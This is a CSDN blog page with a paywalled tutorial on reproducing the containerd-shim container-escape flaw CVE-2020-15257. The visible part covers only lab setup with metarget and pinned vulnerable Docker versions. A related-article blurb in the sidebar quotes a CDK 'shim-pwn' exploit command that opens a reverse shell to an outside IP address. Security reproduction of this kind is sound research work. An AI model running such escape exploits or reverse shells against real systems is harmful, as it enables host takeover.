容器逃逸漏洞 Docker containerd-shim(CVE-2020-15257)复现与分析

信安成长日记

已于 2023-08-17 17:23:28 修改

阅读量3.1k

点赞数 1

分类专栏：漏洞复现与分析文章标签：安全

于 2022-04-08 11:30:55 首次发布

本文链接：https://blog.csdn.net/SHELLCODE_8BIT/article/details/124037215

版权

漏洞复现与分析专栏收录该内容

12 篇文章 1 订阅 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

本文介绍了如何复现和分析Docker containerd-shim的CVE-2020-15257漏洞，详细讨论了Unix域套接字在该漏洞中的作用，以及利用该漏洞进行容器逃逸的条件和步骤。

摘要由CSDN通过智能技术生成

1.环境搭建

2.安装靶场

3.基础知识

3.1 Unix域套接字(Unix domain socket)

1.环境搭建

1.1 下载ubuntu 18.04 使用20版本会出错

1.2 下载metarget安装依赖

git clone https://github.com/brant-ruan/metarget.git
cd metarget/
pip3 install -r requirements.txt

2.安装靶场

./metarget cnv install cve-2020-15257

如果安装失败也可以使用下列命令

apt-get install docker-ce=5:18.09.7~3-0~ubuntu-bionic containerd.io=1.3.9-1 -y

3.基础知识

3.1 Unix域套接字(Unix domain socket)

Unix域套接字(Unix domain socket)又叫 IPC(inter-process communication 进程间通信) socket

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

信安成长日记

关注关注

1
点赞
踩
3

收藏

觉得还不错? 一键收藏
打赏
1
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

订阅专栏

docker-compose-linux-x86_64

09-21

Docker-Compose项目是Docker官方的开源项目，负责实现对Docker容器集群的快速编排。 Docker-Compose将所管理的容器分为三层，分别是工程（project），服务（service）以及容器（container）。Docker-Compose运行...

Linux本地内核提权漏洞复现(CVE-2019-13272)

m0_48520508的博客

01-19

799

0x00简介在5.1.17之前的Linux内核中，kernel / ptrace.c中的ptrace_link错误地处理了想要创建ptrace关系的进程的凭据记录，这允许本地用户通过利用父子的某些方案来获取root访问权限进程关系，父进程删除权限并调用execve可能允许攻击者控制。 0x01漏洞概述 Linux执行PTRACE_TRACEME函数时，ptrace_link函数将获得对父进程凭据的RCU引用，然后将该指针指向get_cred函数，但是，对象struct cred的生存周期规则不允许无条.

1 条评论您还未登录，请先登录后发表或查看评论

Docker 容器逃逸漏洞 (CVE-2020-15257)复现

玄道的网安博客

12-27

1327

漏洞概述 containerd是行业标准的容器运行时，可作为Linux和Windows的守护程序使用。在版本1.3.9和1.4.3之前的容器中，容器填充的API不正确地暴露给主机网络容器。填充程序的API套接字的访问控制验证了连接过程的有效UID为0，但没有以其他方式限制对抽象Unix域套接字的访问。这将允许在与填充程序相同的网络名称空间中运行的恶意容器（有效UID为0，但特权降低）导致新进程以提升的特权运行。影响版本 containerd < 1.4.3 containe...

云原生-Docker安全-容器逃逸&系统内核漏洞(解决docker.com无法访问)

m0_74402888的博客

08-16

1026

docker run -itd --net=host ubuntu:18.04 /bin/bash //--net=host是前提条件，不加这个参数启动的docker没有这个漏洞。./cdk_linux_amd64 run shim-pwn reverse 111.230.109.74 5566 //这是指定漏洞利用。4、实验获取云服务器上docker搭建的Web权限后进行逃逸。3、编译修改后EXP后等待管理员进入容器执行。1、安装docker对应版本。1、安装docker对应版本。

docker逃逸漏洞复现（CVE-2019-5736）

热门推荐

网络安全。

01-29

1万+

0x01 概述 2019年2月11日，runC的维护团队报告了一个新发现的漏洞，该漏洞最初由Adam Iwaniuk和Borys Poplawski发现。该漏洞编号为CVE-2019-5736，漏洞影响在默认设置下运行的Docker容器，并且攻击者可以使用它来获得主机上的root级访问权限。 0x02 漏洞原理漏洞点在于runC，RunC是一个容器运行时，最初是作为Docker的一部分开发的，后...

Docker 逃逸漏洞复现

Jack_chao_的博客

03-27

1365

CVE-2020-15257-host模式容器逃逸漏洞分析

CVE-2020-15257 Docker 容器逃逸复现

weixin_45260839的博客

07-15

1099

CVE-2020-15257 Docker 容器逃逸复现

docker的逃逸复现（CVE-2020-15257-host模式容器逃逸漏洞）

m0_63306943的博客

02-28

1346

因为docker所使用的是隔离技术，就导致了容器内的进程无法看到外面的进程，但外面的进程可以看到里面，所以如果一个 Docker 容器内部可以操作该容器的外部资源，一般理解为操作宿主机的行为。叫做docker逃逸。host模式这种模式下，容器和主机已经没有网络隔离了，它们共享同一个网络命名空间，容器的网络配置和主机完全一样，使用主机的IP地址和端口，可以查看到主机所有网卡信息、网络资源，在网络性能上没有损耗。但也正是因为没有网络隔离，容器和主机容易产生网络资源冲突、争抢，以及其他的一些问题。

【漏洞复现】Docker runC 容器逃逸漏洞(CVE-2019-5736)

做自己喜欢的事，并将其发挥到极致！

12-09

5370

2019年2月11日，runC的维护团队报告了一个新发现的漏洞，SUSE Linux GmbH高级软件工程师Aleksa Sarai公布了影响Docker, containerd, Podman, CRI-O等默认运行时容器runc的严重漏洞CVE-2019-5736。漏洞会对IT运行环境带来威胁，漏洞利用会触发容器逃逸、影响整个容器主机的安全，最终导致运行在该主机上的其他容器被入侵。漏洞影响AWS, Google Cloud等主流云平台。日前，该容器逃逸漏洞的PoC利用代码已在GitHub上公布。

基于Docker和Docker-Compose的Vulhub漏洞环境设计源码

最新发布

10-02

该项目是一个基于Docker和Docker-Compose构建的Vulhub漏洞环境集合源码，包含2259个文件，涵盖558个PNG图像、461个Markdown文档、286个YAML配置文件、92个Python脚本、86个Shell脚本、83个Java源代码文件、63个XML...

CVE-2020-15257复现1

08-03

CVE-2020-15257复现1

docker-pi-hole：Docker容器中的Pi-hole

02-03

将docker-compose.yml.example复制到docker-compose.yml并根据需要进行更新。请参见以下示例：示例： version : " 3 " # More info at ...

【首发】CVE-2020-15257 容器逃逸漏洞复现与解析附Poc

爱国小白帽

12-05

3113

漏洞简介 containerd是行业标准的容器运行时，可作为Linux和Windows的守护程序使用。在版本1.3.9和1.4.3之前的容器中，容器填充的API不正确地暴露给主机网络容器。填充程序的API套接字的访问控制验证了连接过程的有效UID为0，但没有以其他方式限制对抽象Unix域套接字的访问。这将允许在与填充程序相同的网络名称空间中运行的恶意容器（有效UID为0，但特权降低）导致新进程以提升的特权运行。影响版本 containerd < 1.4.3 containerd < 1.3.9

Docker基础之containerd的shim

m0_43405302的博客

11-28

4656

一、shim containerd下的shim是充当containerd和runc之间的中间件，用来组装runc命令的参数，负责容器中进程的启动。 containerd中调用shim时执行的命令如下： /root/lib-containerd/containerd/bin/containerd-shim {containerID} {bundleDirPath} runc 其中三个参数如下： 1、Arg0:容器Id 2、Arg1:路径 3、Arg2:执行时间二、主函数main() func main()

记一次docker逃逸漏洞的复现

zkaqlaoniao的博客

10-07

225

公众号：掌控安全EDU 分享更多技术文章，欢迎关注一起探讨学习。

CVE-2020-15257: containerd 虚拟环境逃逸漏洞通告

爱国小白帽

12-01

1781

报告编号：B6-2020-120101 报告来源：360CERT 报告作者：360CERT 更新日期：2020-12-01 0x01 漏洞简述 2020年12月01日，360CERT监测发现 containerd 发布了 containerd 权限提升漏洞的风险通告，该漏洞编号为 CVE-2020-15257 ，漏洞等级：中危，漏洞评分：6.1 。 containerd 修复了一处容器权限逃逸漏洞，该漏洞的本质是满足特定条件的容器可以绕过访问权限访问 containerd 的控制API 进而导.

【容器运行时】一文理解 OCI、runc、containerd、docker、shim进程、cri、kubelet 之间的关系

叮当猫的喵i

03-06

3752

方法 https://github.com/containerd/containerd/blob/v1.4.3/runtime/v2/runc/v2/service.go#L174-L286。结合源码 https://github.com/containerd/containerd/blob/v1.4.3/runtime/v2/shim/shim.go#L221-L229。可以看出，containerd是containerd-shim的父进程，contaienrd-shim是容器进程的父进程。

Docker-CVE-2020-15257

Karka_的博客

08-14

196

在Linux系统中存在着一种unix域套接字，其作用是为了进程间通信，其使用方法类似于普通的socket套接字，只不过使用socket函数的时候域设置为AF_UNIX，同时套接字的类型分为：流套接字（SOCK_STREAM）和数据报套接字（SOCK_DGRAM）。结构体的第二个字段就是文件路径，它也分为两种：1. 普通的文件路径：它是一个合法的Linux文件路径，当不需要这个套接字的时候需要删除文件。

shim layer

02-22

shim layer（也称为适配层或包装层）是一种软件设计模式，用于在不同的软件组件之间提供兼容性和互操作性。它充当一个中间层，将不同的接口、协议或数据格式转换为其他组件可以理解和使用的形式。 Shim layer通常用于以下情况： 1. 系统升级或迁移：当系统需要升级或迁移到新的技术平台时，shim layer可以帮助旧的组件与新的环境进行交互。 2. 跨平台开发：当开发跨平台应用程序时，shim layer可以提供对不同操作系统或硬件平台的适配。 3. 接口兼容性：当两个组件使用不同的接口定义时，shim layer可以提供一个中间层，使它们能够相互通信和交互。 Shim layer的实现方式可以有多种，包括使用适配器模式、代理模式或中间件等。它可以在运行时动态创建和加载，也可以作为静态库或模块进行编译和链接。